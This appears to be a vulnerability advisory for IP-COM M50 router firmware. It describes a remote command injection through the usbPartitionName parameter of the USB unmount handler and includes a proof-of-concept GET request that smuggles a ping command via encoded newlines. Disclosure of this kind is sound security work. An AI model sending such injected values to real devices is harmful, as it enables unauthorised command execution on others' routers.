# ip-com-12 vendor:IP-COM product:M50 version:V15.11.0.33(10768) type:Remote Command Injection author:Yifeng Li, Wolin Zhuang; ## Vulnerability description We found an Command Injection vulnerability in IP-COM Technology IP-COM’s M50 routers with firmware which was released recently, allows remote attackers to execute arbitrary OS commands from a crafted GET request. ## Remote Command Injection vulnerability In formSetUSBPartitionUmount function, the parameter "usbPartitionName" is insufficiently filter the string delivered by the user, so we can control the usbPartitionName such as “-h%0aping%20x.x.x.x%20-w%2-5%0a ” to attack the OS. ![](https://i.imgur.com/ZDXGwpn.png) ![](https://i.imgur.com/sJ3AykL.png) ## PoC ### Remote Command Injection We set the value of "usbPartitionName" as aaa\nping x.x.x.x and the router will excute ping command. example.com/action/umountUSBPartition?usbPartitionName=-h%0aping%20x.x.x.x%20-w%2-5%0a ![](https://i.imgur.com/dMRyJQU.jpg)